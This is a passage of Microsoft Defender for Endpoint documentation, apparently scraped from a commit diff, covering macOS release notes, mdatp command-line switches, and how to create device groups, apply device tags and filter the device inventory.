-&ensp;Released: **Jan 12, 2022**<br/>
-&ensp;Published: **Jan 12, 2022**<br/>
-&ensp;Build: **101.54.16**<br/>
-&ensp;Release version: **20.121111.15416.0**<br/>
-
-**What's new**
--- macOS 10.14 (Mojave) is no longer supported-- After a product setting stops being managed by the administrator through MDM, it now reverts to the value it had before it was managed (the value configured locally by the end user or, if no such local value was explicitly provided, the default value used by the product). Prior to this change, after a setting stopped being managed, its managed value persisted and was still used by the product.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.49.25**<br/>
-&ensp;Release version: **20.121092.14925.0** <br/>
-
-**What's new**
--- Added a new switch to the command-line tool to control whether archives are scanned during on-demand scans. This can be configured through `mdatp config scan-archives --value [enabled/disabled]`. By default, this is set to enabled.-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.47.27**<br/>
-&ensp;Release version: **20.121082.14727.0** <br/>
-
-**What's new**
--- Fix for a system freeze occurring on shutdown on macOS Mojave and macOS Catalina. -
-<br/>
-</details>
-
-&ensp;Build: **101.43.84**<br/>
-&ensp;Release version: **20.121082.14384.0** <br/>
-
-**What's new**
--- Candidate build for macOS 12 (Monterey)-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.41.10**<br/>
-&ensp;Release version: **20.121072.14110.0** <br/>
-
-**What's new**
--- Added new switches to the command-line tool:
- - Control degree of parallelism for on-demand scans. This can be configured through `mdatp config maximum-on-demand-scan-threads --value [number-between-1-and-64]`. By default, a degree of parallelism of 2 is used.
- - Control whether scans after security intelligence updates are enabled or disabled. This can be configured through `mdatp config scan-after-definition-update --value [enabled/disabled]`. By default, this is set to enabled.
-- Changing the product log level now requires elevation.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.40.84**<br/>
-&ensp;Release version: **20.121071.14084.0** <br/>
-
-**What's new**
--- M1 chip native support-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.37.97**<br/>
-&ensp;Release version: **20.121062.13797.0** <br/>
-
-**What's new**
--- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.34.28**<br/>
-&ensp;Release version: **20.121061.13428.0** <br/>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.34.27**<br/>
-&ensp;Release version: **20.121052.13427.0** <br/>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.34.20**<br/>
-&ensp;Release version: **20.121051.13420.0** <br/>
-
-**What's new**
--- [Device control for macOS](mac-device-control-overview.md) is now in general availability.-- Addressed an issue where a quick scan couldn't be started from the status menu on macOS 11 (Big Sur).-- Other bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.32.69**<br/>
-&ensp;Release version: **20.121042.13269.0** <br/>
-
-**What's new**
--- Addressed an issue where concurrent access to the keychain from Microsoft Defender for Endpoint and other applications can lead to keychain corruption.-
-<br/>
-</details>
-
-&ensp;Build: **101.29.64**<br/>
-&ensp;Release version: **20.121042.12964.0** <br/>
-
-**What's new**
--- Starting with this version, threats detected during on-demand antivirus scans triggered through the command-line client are automatically remediated. Threats detected during scans triggered through the user interface still require manual action.-- `mdatp diagnostic real-time-protection-statistics` now supports two other switches:
- - `--sort`: sorts the output descending by total number of files scanned
- - `--top N`: displays the top N results (only works if `--sort` is also specified)
-- Performance improvements (specifically for when `YARN` is used) & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.27.50**<br/>
-&ensp;Release version: **20.121022.12750.0** <br/>
-
-**What's new**
--- Fix to accommodate for Apple certificate expiration for macOS Catalina and earlier. This fix restores Microsoft Defender Vulnerability Management (MDVM) functionality. -
-<br/>
-</details>
-
-&ensp;Build: **101.25.69**<br/>
-&ensp;Release version: **20.121022.12569.0** <br/>
-
-**What's new**
--- Microsoft Defender for Endpoint on macOS is now available in preview for US Government customers. For more information, see [Microsoft Defender for Endpoint for US Government customers](gov.md).-- Performance improvements (specifically for the situation when the XCode Simulator app is used) & bug fixes.-
-<br/>
-</details>
-
-&ensp;Build: **101.23.64**<br/>
-&ensp;Release version: **20.121021.12364.0** <br/>
-
-**What's new**
--- Added a new option to the command-line tool to view information about the last on-demand scan. To view information about the last on-demand scan, run `mdatp health --details antivirus`.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.22.79** <br>
-&ensp;Release version: **20.121012.12279.0**<br>
-
-**What's new**
--- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build:**101.19.88**<br>
-&ensp;Release version: **20.121011.11988.0**<br>
-
-**What's new**
--- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.19.48**<br>
-&ensp;Release version: **20.120121.11948.0**<br>
-
-**What's new**
-
-> [!NOTE]
-> The old command-line tool syntax has been deprecated with this release. For information on the new syntax, see [Resources](mac-resources.md#configuring-from-the-command-line).
-- Added a new command-line switch to disable the network extension: `mdatp system-extension network-filter disable`. This command can be useful to troubleshoot networking issues that could be related to Microsoft Defender for Endpoint on Mac.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.19.21**<br>
-&ensp;Release version: **20.120101.11921.0** <br>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.15.26**<br>
-&ensp;Release version: **20.120102.11526.0**<br>
-
-**What's new**
--- Improved the reliability of the agent when running on macOS 11 Big Sur.-- Added a new command-line switch (`--ignore-exclusions`) to ignore AV exclusions during custom scans (`mdatp scan custom`).-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.13.75**<br>
-&ensp;Release version: **20.120101.11375.0**<br>
-
-**What's new**
--- Removed conditions when Microsoft Defender for Endpoint was triggering a macOS 11 (Big Sur) bug that manifests into a kernel panic.-- Fixed a memory leak in the Endpoint Security system extension when running on mac 11 (Big Sur).-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.10.72** <br>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.09.61**<br>
-
-**What's new**
--- Added a new managed preference for [disabling the option to send feedback](mac-preferences.md#show--hide-option-to-send-feedback).-- Status menu icon now shows a healthy state when the product settings are managed. Previously, the status menu icon was displaying a warning or error state, even though the product settings were managed by the administrator.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.09.50**<br>
-
-**What's new**
--- This product version has been validated on macOS Big Sur 11 preview 9.-- The new syntax for the mdatp command-line tool is now the default one. For more information on the new syntax, see [Resources for Microsoft Defender for Endpoint on macOS](mac-resources.md#configuring-from-the-command-line).
-> [!NOTE]
-> The old command-line tool syntax will be removed from the product on **January 1st, 2021**.
-- Extended `mdatp diagnostic create` with a new parameter (`--path [directory]`) that allows the diagnostic logs to be saved to a different directory.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.09.49**<br>
-
-**What's new**
--- User interface improvements to differentiate exclusions that are managed by the IT administrator versus exclusions defined by the local user.-- Improved CPU utilization during on-demand scans.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.07.23**<br>
-
-**What's new**
--- Added new fields to the output of `mdatp --health` for checking the status of passive mode and the EDR group ID.
-> [!NOTE]
-> `mdatp --health` will be replaced with `mdatp health` in a future product update.
-- Fixed a bug where automatic sample submission wasn't marked as managed in the user interface.-- Added new settings for controlling the retention of items in the antivirus scan history. You can now [specify the number of days to retain items in the scan history](mac-preferences.md#antivirus-scan-history-retention-in-days) and [specify the maximum number of items in the scan history](mac-preferences.md#maximum-number-of-items-in-the-antivirus-scan-history).-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.06.63**<br>
-
-**What's new**
--- Addressed a performance regression introduced in version `101.05.17`. The regression was introduced with the fix to eliminate the kernel panics some customers have observed when accessing SMB shares. We have reverted this code change and are investigating alternative ways to eliminate the kernel panics.-
-<br/>
-</details>
-
-&ensp;Build: **101.05.17**<br>
-
-**What's new**
-
-> [!IMPORTANT]
-> We are working on a new and enhanced syntax for the `mdatp` command-line tool. The new syntax is currently the default in the Insider Fast and Insider Slow update channels. We encourage you to familiarize yourself with this new syntax.
-> We will continue supporting the old syntax in parallel with the new syntax and will provide more communication around the deprecation plan for the old syntax in the upcoming months.
-- Addressed a kernel panic that occurred sometimes when accessing SMB file shares.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.05.16**<br>
-
-**What's new**
--- Improvements to quick scan logic to significantly reduce the number of scanned files.-- Added [autocompletion support](mac-resources.md#how-to-enable-autocompletion) for the command-line tool.-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.03.12**<br>
-
-**What's new**
--- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.01.54**<br>
-
-**What's new**
--- Improvements around compatibility with Time Machine-- Accessibility improvements-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.00.31** <br>
-
-**What's new**
--- Improved [product onboarding experience for Intune users](/mem/intune/apps/apps-advanced-threat-protection-macos)-- Antivirus [exclusions now support wildcards](mac-exclusions.md#supported-exclusion-types)-- Added the ability to trigger antivirus scans from the macOS contextual menu. You can now right-click a file or a folder in Finder and select **Scan with Microsoft Defender for Endpoint**.-- In-place product downgrades are now explicitly disallowed by the installer. If you need to downgrade, first uninstall the existing version and reconfigure your device.-- Other performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.90.27** <br>
-
-**What's new**
--- You can now [set an update channel](mac-updates.md#set-the-channel-name) for Microsoft Defender for Endpoint on macOS that is different from the system-wide update channel.-- New product icon-- Other user experience improvements-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.86.92**<br>
-
-**What's new**
--- Improvements around compatibility with Time Machine-- Addressed an issue where the product was sometimes not cleaning all files under `/Library/Application Support/Microsoft/Defender` during uninstallation.-- Reduced the CPU utilization of the product when Microsoft products are updated through Microsoft AutoUpdate.-- Other performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.86.91**<br>
-
-**What's new**
-
-> [!CAUTION]
-> To ensure the most complete protection for your macOS devices and in alignment with Apple stopping delivery of macOS native security updates to OS versions older than [current - 2], MDATP for Mac deployment and updates will no longer be supported on macOS Sierra [10.12]. MDATP for Mac updates and enhancements will be delivered to devices running versions Catalina [10.15], Mojave [10.14], and High Sierra [10.13].
->
-> If you already have MDATP for Mac deployed to your Sierra [10.12] devices, please upgrade to the latest macOS version to eliminate risks of losing protection.
--- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.83.73**<br>
-
-**What's new**
--- Added more controls for IT administrators around [management of exclusions](mac-preferences.md#exclusion-merge-policy), [management of threat type settings](mac-preferences.md#threat-type-settings-merge-policy), and [disallowed threat actions](mac-preferences.md#disallowed-threat-actions).-- When Full Disk Access isn't enabled on the device, a warning is now displayed in the status menu.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.82.60** <br>
-
-**What's new**
--- Addressed an issue where the product fails to start following a definition update.-
-<br/>
-</details>
-
-&ensp;Build: **100.80.42**<br>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.79.42**<br>
-
-**What's new**
--- Fixed an issue where Microsoft Defender for Endpoint on Mac was sometimes interfering with Time Machine.-- Added a new switch to the command-line utility for testing the connectivity with the backend service-
- ```bash
- mdatp connectivity test
- ```
-- Added ability to view the full threat history in the user interface (can be accessed from the **Protection history** view).-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.72.15**<br>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.70.99**<br>
-
-**What's new**
--- Addressed an issue that impacts the ability of some users to upgrade to macOS Catalina when real-time protection is enabled. This sporadic issue was caused by Microsoft Defender for Endpoint locking files within Catalina upgrade package while scanning them for threats, which led to failures in the upgrade sequence.-
-<br/>
-</details>
-
-&ensp;Build: **100.68.99**<br>
-
-**What's new**
--- Added the ability to configure the antivirus functionality to run in [passive mode](mac-preferences.md#enforcement-level-for-antivirus-engine).-- Performance improvements & bug fixes-
-<br/>
-</details>
-
-&ensp;Build: **100.65.28**<br>
-
-**What's new**
--- Added support for macOS Catalina.-
-> [!CAUTION]
-> macOS 10.15 (Catalina) contains new security and privacy enhancements. Beginning with this version, by default, applications are not able to access certain locations on disk (such as Documents, Downloads, Desktop, etc.) without explicit consent. In the absence of this consent, Microsoft Defender for Endpoint is not able to fully protect your device.
->
-> The mechanism for granting this consent depends on how you deployed Microsoft Defender for Endpoint:
->
-> - For manual deployments, see the updated instructions in the [Manual deployment topic](mac-install-manually.md#allow-full-disk-access).
-> - For managed deployments, see the updated instructions in the [JAMF-based deployment](mac-install-with-jamf.md) and [Microsoft Intune-based deployment](mac-install-with-intune.md#create-system-configuration-profiles) topics.
--- Performance improvements & bug fixes-
-<br/>
-</details>
-
-<br/><br/>
-</details>
---
security Machine Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-groups.md
- Title: Create and manage device groups in Microsoft Defender for Endpoint
-description: Create device groups and set automated remediation levels on them by confirming the rules that apply on the group
------- m365-security-- tier2-- Previously updated : 09/12/2023--
-# Create and manage device groups
--
-**Applies to:**
--- Microsoft Entra ID-- Office 365-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-In an enterprise scenario, security operation teams are typically assigned a set of devices. These devices are grouped together based on a set of attributes such as their domains, computer names, or designated tags.
-
-In Microsoft Defender for Endpoint, you can create device groups and use them to:
--- Limit access to related alerts and data to specific Microsoft Entra user groups with [assigned RBAC roles](rbac.md)-- Configure different auto-remediation settings for different sets of devices-- Assign specific remediation levels to apply during automated investigations-- In an investigation, filter the **Devices list** to specific device groups by using the **Group** filter.-
-You can create device groups in the context of role-based access (RBAC) to control who can take specific action or see information by assigning the device group(s) to a user group. For more information, see [Manage portal access using role-based access control](rbac.md).
-
-> [!TIP]
-> For a comprehensive look into RBAC application, read: [Is your SOC running flat with RBAC](https://techcommunity.microsoft.com/t5/Windows-Defender-ATP/Is-your-SOC-running-flat-with-limited-RBAC/ba-p/320015).
-
-As part of the process of creating a device group, you'll:
--- Set the automated remediation level for that group. For more information on remediation levels, see [Use Automated investigation to investigate and remediate threats](automated-investigations.md).-- Specify the matching rule that determines which device group belongs to the group based on the device name, domain, tags, and OS platform. If a device is also matched to other groups, it's added only to the highest ranked device group.-- Select the Microsoft Entra user group that should have access to the device group.-- Rank the device group relative to other groups after it's created.-
-> [!NOTE]
-> A device group is accessible to all users if you don't assign any Microsoft Entra groups to it.
-
-## Create a device group
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Permissions** \> **Device groups**.
-
-2. Click **Add device group**.
-
-3. Enter the group name and automation settings and specify the matching rule that determines which devices belong to the group. See [How the automated investigation starts](automated-investigations.md#how-the-automated-investigation-starts).
-
- > [!TIP]
- > If you want to use tagging for grouping devices, see [Create and manage device tags](machine-tags.md).
-
-4. Preview several devices that will be matched by this rule. If you're satisfied with the rule, click the **User access** tab.
-
-5. Assign the user groups that can access the device group you created.
-
- > [!NOTE]
- > You can only grant access to Microsoft Entra user groups that have been assigned to RBAC roles.
-
-6. Click **Close**. The configuration changes are applied.
-
- > [!NOTE]
- > Device Groups in Defender for Business are managed differently. For more information, see [Device groups in Microsoft Defender for Business](../defender-business/mdb-create-edit-device-groups.md).
-
-## Manage device groups
-
-You can promote or demote the rank of a device group so that it's given higher or lower priority during matching. A device group with a rank of 1 is the highest ranked group. When a device is matched to more than one group, it's added only to the highest ranked group. You can also edit and delete groups.
-
-> [!WARNING]
-> Deleting a device group may affect email notification rules. If a device group is configured under an email notification rule, it will be removed from that rule. If the device group is the only group configured for an email notification, that email notification rule will be deleted along with the device group.
-
-By default, device groups are accessible to all users with portal access. You can change the default behavior by assigning Microsoft Entra user groups to the device group.
-
-Devices that aren't matched to any groups are added to Ungrouped devices (default) group. You cannot change the rank of this group or delete it. However, you can change the remediation level of this group, and define the Microsoft Entra user groups that can access this group.
-
-> [!NOTE]
-> Applying changes to device group configuration may take up to several minutes.
-
-### Add device group definitions
-
-Device group definitions can also include multiple values for each condition. You can set multiple tags, device names, and domains to the definition of a single device group.
-
-1. Create a new device group, then select **Devices** tab.
-2. Add the first value for one of the conditions.
-3. Select `+` to add more rows of the same property type.
-
-> [!TIP]
-> Use the 'OR' operator between rows of the same condition type, which allows multiple values per property.
-> You can add up to 10 rows (values) for each property type - tag, device name, domain.
-
-For more information on linking to device groups definitions, see [Device groups - Microsoft 365 security](https://sip.security.microsoft.com/homepage).
-
-## Related topics
--- [Manage portal access using role-based based access control](rbac.md)-- [Create and manage device tags](machine-tags.md)-- [Get list of tenant device groups using Graph API](/graph/api/device-list-memberof)
security Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-tags.md
- Title: Create and manage device tags
-description: Use device tags to group devices to capture context and enable dynamic list creation as part of an incident
------- m365-security-- tier2--- Previously updated : 02/27/2023--
-# Create and manage device tags
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Add tags on devices to create a logical group affiliation. Device tags support proper mapping of the network, enabling you to attach different tags to capture context and to enable dynamic list creation as part of an incident. Tags can be used as a filter in the **Device inventory** view, or to group devices. For more information on device grouping, see [Create and manage device groups](machine-groups.md).
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-You can add tags on devices using the following ways:
--- Using the portal-- Using dynamic rules for device tagging-- Setting a registry key value (Windows)-- Using Defender for Endpoint security settings management (macOS / Linux)-- Creating a configuration profile (macOS / Linux)-- Creating a custom profile in Microsoft Intune (Windows 10 or later)-- Using App configuration policy in Intune (iOS / Android)-
-> [!NOTE]
-> There might be some latency between the time a tag is added to a device and its availability in the devices list and device page.
-
-To add device tags using API, see [Add or remove device tags API](api/add-or-remove-machine-tags.md).
-
-## Add device tags using the portal
-
-1. Select the device that you want to manage tags on. You can select or search for a device from any of the following views:
-
- - **Alerts queue** - Select the device name beside the device icon from the alerts queue.
- - **Devices inventory** - Select the device name from the list of devices.
- - **Search box** - Select Device from the drop-down menu and enter the device name.
-
- You can also get to the alert page through the file and IP views.
-
-2. Select **Manage tags** from the row of Response actions.
-
- :::image type="content" source="media/manage-tags-option.png" alt-text="Image of manage tags button" lightbox="media/manage-tags-option.png":::
-
-
-3. Type to find or create tags
-
- :::image type="content" source="media/create-new-tag.png" alt-text="Adding tags on device1" lightbox="media/create-new-tag.png":::
-
-Tags are added to the device view and will also be reflected on the **Devices inventory** view. You can then use the **Tags** filter to see the relevant list of devices.
-
-> [!NOTE]
-> Filtering might not work on tag names that contain parenthesis or commas.
->
-> When you create a new tag, a list of existing tags are displayed. The list only shows tags created through the portal. Existing tags created from client devices will not be displayed.
-
-You can also delete tags from this view.
--
-## Add device tags using dynamic rules for device tagging
-
-You can create and manage rules that automatically assign and remove tags from devices based on user-defined criteria directly in the Microsoft Defender portal. Please refer to following documents for details
--- [Manage your devices with ease using dynamic rules for device tagging in Microsoft Defender](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/manage-your-devices-with-ease-using-dynamic-rules-for-device/ba-p/4024988)-- [Asset rule management - Dynamic rules for devices](/microsoft-365/security/defender/configure-asset-rules)-
-## Add device tags by setting a registry key value
-
-> [!NOTE]
-> Applicable only on the following devices:
->
-> - Windows 11
-> - Windows 10, version 1709 or later
-> - Windows Server, version 1803 or later
-> - Windows Server 2016
-> - Windows Server 2012 R2
-> - Windows Server 2008 R2 SP1
-> - Windows 8.1
-> - Windows 7 SP1
-
-> [!NOTE]
-> The maximum number of characters that can be set in a tag is 200.
-
-Devices with similar tags can be handy when you need to apply contextual action on a specific list of devices.
-
-Use the following registry key entry to add a tag on a device:
--- Registry key: `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging\`-- Registry key value (REG_SZ): `Group`-- Registry key data: `Name of the tag you want to set`-
-> [!NOTE]
-> The device tag is part of the device information report that's generated once a day. As an alternative, you may choose to restart the endpoint that would transfer a new device information report.
->
-> If you need to remove a tag that was added using the above Registry key, clear the contents of the Registry key data instead of removing the 'Group' key.
-
-## Add device tags using the Defender for Endpoint security settings management
-
-> [!NOTE]
-> Applicable only on the following devices:
->
-> - macOS
-> - Linux
-
-You can use Defender for Endpoint security settings management to define and apply device tags for macOS and Linux. You can perform this task by creating Endpoint detection and response security policy. Please refer to following documentation for details.
--- [Manage endpoint security policies on devices onboarded to Microsoft Defender for Endpoint](/mem/intune/protect/mde-security-integration)-- [Manage endpoint security policies in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/manage-security-policies)-
-## Add device tags by creating a configuration profile
-
-> [!NOTE]
-> Applicable only on the following devices:
->
-> - macOS
-> - Linux
-
-You can use configuration profile to set device tag for macOS and Linux. Please refer to following documentation for details.
--- **For macOS**, create configuration profile (.plist file) and deploy it manually or through management tool including Intune. See the guidance in [Set preferences for Microsoft Defender for Endpoint on macOS](/microsoft-365/security/defender-endpoint/mac-preferences). To deploy configuration profile with Intune, follow the guidance in [Use custom settings for macOS devices in Microsoft Intune](/mem/intune/configuration/custom-settings-macos).--- **For Linux**, create configuration profile (.json file) and deploy it manually or through management tool. See the guidance in [Set preferences for Microsoft Defender for Endpoint on Linux](/microsoft-365/security/defender-endpoint/linux-preferences)-
-## Add device tags by creating a custom profile in Microsoft Intune
-
-> [!NOTE]
-> Applicable only on the following devices:
->
-> - Windows 10
-> - Windows 11
-
-You can use Microsoft Intune to define and apply device tags. You can perform this task by creating a device configuration profile using custom settings in Intune. For more information, see [Create a profile with custom settings in Intune](/mem/intune/configuration/custom-settings-configure).
--- In the [Create the profile](/mem/intune/configuration/custom-settings-configure) procedure, for step 3, choose [Windows 10 and later](/mem/intune/configuration/custom-settings-windows-10).--- In the [OMA-IRU settings](/mem/intune/configuration/custom-settings-windows-10) section, for **Data type**, choose **String**. For **OMA-URI**, type (or paste) `./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group`.---
-## Add device tags by creating app configuration policy in Microsoft Intune
-
-> [!NOTE]
-> Applicable only on the following devices:
->
-> - iOS
-> - Android
-
-You can use Microsoft Intune to define and apply tag for mobile devices. You can perform this task by creating an app configuration profile in Intune. For more information, please refer to following information.
--- [Tag mobile devices with Microsoft Defender for Endpoint](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-mobile-device-tagging-for-ios-and-android/ba-p/3897368)--- **For iOS**, follow the guidance in [Configure Microsoft Defender for Endpoint on iOS features](/microsoft-365/security/defender-endpoint/ios-configure-features).-- **For Android**, follow the guidance on [Configure Defender for Endpoint on Android features](/microsoft-365/security/defender-endpoint/android-configure).-
security Machines View Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machines-view-overview.md
- Title: Device inventory
-description: Learn about the available features that you can use from the Devices list such as sorting, filtering, and exporting the list to enhance investigations.
-------- m365-security-- tier2- Previously updated : 04/17/2024--
-# Device inventory
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-machinesview-abovefoldlink)
-
-The **Device inventory** shows a list of the devices in your network where alerts were generated. By default, the queue displays devices seen in the last 30 days. At a glance, you see information such as domain, risk level, OS platform, and other details for easy identification of devices most at risk.
-
-> [!NOTE]
-> The device inventory is available in different Microsoft Defender XDR services. The information available to you can differ depending on your license. To get the most complete set of capabilities, use [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037).
->
-> Risk Level, which can influence enforcement of Conditional Access and other security policies in Microsoft Intune, is now available for Windows devices.
-
-There are several options you can choose from to customize the devices list view. On the top navigation you can:
--- Add or remove columns-- Export the entire list in CSV format-- Select the number of items to show per page-- Apply filters-
-During the onboarding process, the **Devices list** is gradually populated with devices as they begin to report sensor data. Use this view to track your onboarded endpoints as they come online, or download the complete endpoint list as a CSV file for offline analysis.
-
-> [!NOTE]
->
-> If you export the devices list, it contains every device in your organization. It might take a significant amount of time to download, depending on how large your organization is. Exporting the list in CSV format displays the data in an unfiltered manner. The CSV file includes all devices in the organization, regardless of any filtering applied in the view itself.
->
-> In addition, when you export the devices list, the antivirus status shows as `Not-Supported`. For antivirus status, use the recently released [Microsoft Defender Antivirus health report](/microsoft-365/security/defender-endpoint/device-health-microsoft-defender-antivirus-health) instead. This report allows you to export even more details.
-
-The following image depicts the devices list:
--
-## Sort and filter the device list
-
-You can apply the following filters to limit the list of alerts and get a more focused view.
-
-### Device name
-
-During the Microsoft Defender for Endpoint onboarding process, devices onboarded to Defender for Endpoint are gradually populated into the device inventory as they begin to report sensor data. Following this, the device inventory is populated by devices that are discovered in your network through the device discovery process. The device inventory has three tabs that list devices by:
--- **Computers and Mobile**: Enterprise endpoints (workstations, servers, and mobile devices)-- **Network devices**: Devices like routers and switches-- **IoT devices**: Devices like printers and cameras-- **Uncategorized devices**: Devices that couldn't be properly classified-
-## Navigate to the Device inventory page
-
-Access the device inventory page by selecting **Devices** from the **Assets** navigation menu in the [Microsoft Defender portal](https://security.microsoft.com/machines).
-
-## Device inventory overview
-
-The device inventory opens on the **Computers and Mobile** tab. You can see at a glance information such as device name, domain, risk level, exposure level, OS platform, criticality level, onboarding status, sensor health state, mitigation status and other details for easy identification of devices most at risk.
-
-The **Classify critical assets** card allows you to define device groups as business critical. You might also see the **Attack path warning** card, which takes you to Attack paths to examine if any of your assets are part of an attack path. For more information, see [Overview of attack paths](/security-exposure-management/work-attack-paths-overview).
-
-> [!NOTE]
-> Classify critical assets and attack path information is part of Microsoft Security Exposure Management, which is currently in public preview.
-
-Use the **Onboarding Status** column to sort and filter by discovered devices, and devices that are already onboarded to Microsoft Defender for Endpoint.
--
-From the **Network devices** and **IoT devices** tabs, you'll also see information such as vendor, model, and device type:
--
-> [!NOTE]
-> Device discovery Integration with [Microsoft Defender for IoT](/azure/defender-for-iot/organizations/) is available to help locate, identify, and secure your complete OT/IOT asset inventory. Devices discovered with this integration will appear on the **IoT devices** tab. For more information, see [Device discovery integration](device-discovery.md#device-discovery-integration).
->
-> When Defender for IoT is configured, you also can view the devices there. See [Manage your IoT devices with the device inventory for organizations](/azure/defender-for-iot/organizations/how-to-manage-device-inventory-for-organizations).
-
-At the top of each device inventory tab, you can see:
--- The total number of devices.-- The number of devices that are identified as a higher risk to your organization.-- The number of your business critical assets.-- The number of devices that aren't yet onboarded.-- The number of devices with high exposure.-- The number of newly disocovered devices.-
-You can use this information to help you prioritize devices for security posture improvements.
-
-The **Newly discovered** device count for network devices and IoT devices tabs, shows the number of new devices discovered, in the last 7 days, listed in the current view.
--
-## Explore the device inventory
-
-There are several options you can choose from to customize the device inventory view. On the top navigation for each tab you can:
--- Search for a device by name-- Search for a device by the most recently used IP address or IP address prefix-- Add or remove columns-- Export the entire list in CSV format for offline analysis-- Select the date range to display-- Apply filters-
-> [!NOTE]
-> If you export the device list, it will contain every device in your organization. It might take a significant amount of time to download, depending on how large your organization is. Exporting the list in CSV format displays the data in an unfiltered manner. The CSV file will include all devices in the organization, regardless of any filtering applied in the view itself.
-
-You can use the sort and filter functionality available on each device inventory tab to get a more focused view, and to help you assess and manage the devices in your organization.
-
-The counts on the top of each tab are updated based on the current view.
-
-## Use filters to customize the device inventory views
-
-Filter | Description
-:|:
-**Risk level** | The risk level reflects the overall risk assessment of the device based on a combination of factors, including the types and severity of active alerts on the device. Resolving active alerts, approving remediation activities, and suppressing subsequent alerts can lower the risk level.
-**Exposure level** | The exposure level reflects the current exposure of the device based on the cumulative impact of its pending security recommendations. The possible levels are low, medium, and high. Low exposure means your devices are less vulnerable from exploitation.</br></br> If the exposure level says "No data available," there are a few reasons why:</br>- Device stopped reporting for more than 30 days. In that case it's considered inactive, and the exposure isn't computed.</br>- Device OS not supported - see [minimum requirements for Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/minimum-requirements).</br>- Device with stale agent (unlikely).
